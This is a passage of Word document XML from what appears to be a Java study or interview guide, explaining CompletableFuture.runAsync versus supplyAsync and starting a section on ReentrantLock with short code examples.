          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CompletableFuture&lt;Void&gt; since there's no result being returned (void).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D2385" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Takes a Runnable — a task that performs some action without returning any result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F587BB6" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use this method when you want to execute a task asynchronously without needing a result back from the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708EB926" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC47D7" w14:textId="77777777" w:rsidR="005070D3" w:rsidRPr="00CE4B95" w:rsidRDefault="005070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7705795"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CompletableFuture&lt;Void&gt; future = CompletableFuture.runAsync(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CB9E0" w14:textId="77777777" w:rsidR="005070D3" w:rsidRPr="00CE4B95" w:rsidRDefault="005070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7705795"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Simulate some work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3BE1D" w14:textId="77777777" w:rsidR="005070D3" w:rsidRPr="00CE4B95" w:rsidRDefault="005070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7705795"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("Task is running asynchronously");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54611C0D" w14:textId="77777777" w:rsidR="005070D3" w:rsidRPr="00CE4B95" w:rsidRDefault="005070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7705795"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78705593" w14:textId="09BED7C6" w:rsidR="005070D3" w:rsidRPr="00CE4B95" w:rsidRDefault="005070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7705795"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>future.thenRun(() -&gt; System.out.println("Task is completed")); // Output: Task is running asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB02C82" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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 runAsync executes the task asynchronously, but it doesn't return any value, and the CompletableFuture just represents the task’s completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A855F0" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC1">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 of Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5A271" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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upplyAsync()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAF229" w14:textId="77777777" w:rsidR="002F1E65" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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d when you need to execute an asynchronous task that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F761C" w14:textId="34253E11" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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returns a CompletableFuture&lt;T&gt;, where T is the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD30390" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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unAsync()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289840A" w14:textId="77777777" w:rsidR="002F1E65" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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when you need to execute an asynchronous task that does not return a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A8CF2" w14:textId="5004C86B" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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returns a CompletableFuture&lt;Void&gt;, since the task doesn't return anything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A0380" w14:textId="77777777" w:rsidR="002F1E65" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1E65" w:rsidP="002F1E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3DFACE" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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Both methods run tasks asynchronously, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>supplyAsync</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles tasks that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>produce a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runAsync</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles tasks that perform some side effect without returning any value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B3234" w14:textId="013C35EC" w:rsidR="00383507" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00383507">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1A491876">
          <v:rect id="_x0000_i1866" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32842FFD" w14:textId="31770733" w:rsidR="000753D5" w:rsidRPr="00CE4B95" w:rsidRDefault="000753D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc196307775"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Reentrant</w:t>
      </w:r>
      <w:r w:rsidR="00FA6169" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ock in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w14:paraId="27CC929E" w14:textId="52B7902A" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="005E2284">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ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutual exclusion lock (mutex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent.locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. It provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explicit locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with advanced features compared to the traditional synchronized keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB480F" w14:textId="77777777" w:rsidR="00475A57" w:rsidRPr="00CE4B95" w:rsidRDefault="00475A57" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13897F7D" w14:textId="03025D8B" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00825CFF">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Features of ReentrantLock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21C1F6" w14:textId="77777777" w:rsidR="00DC31F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC31F0" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CECA020"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entrant Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7AA91"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thread that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>already holds the lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can acquire it again </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without getting blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E74654"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is the same behavior as the synchronized block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81F390"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ternally, the lock maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hold count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which tracks how many times the current thread has acquired the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2105E6" w14:textId="77777777" w:rsidR="00475A57" w:rsidRPr="00CE4B95" w:rsidRDefault="00475A57" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C612EF7" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ReentrantLock</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lock</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eentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753BCEE" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283D266" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lock</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lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B6806" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</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A428745" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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itical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C3AC9" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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lock</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loc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Reentrant call (same thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877E6E4" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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y</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AE1A9AC" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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nested critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36F43E" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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ly</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D44B050" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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loc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nlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CB2F9" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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0DABFFE" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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ly</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3043C54" w14:textId="77777777" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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loc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nlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29DA23" w14:textId="57B4FA88" w:rsidR="008B2FF3" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233740E1"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anual Lock/Unlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C0CE82"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nlike synchronized, you must </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually acquire and release</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
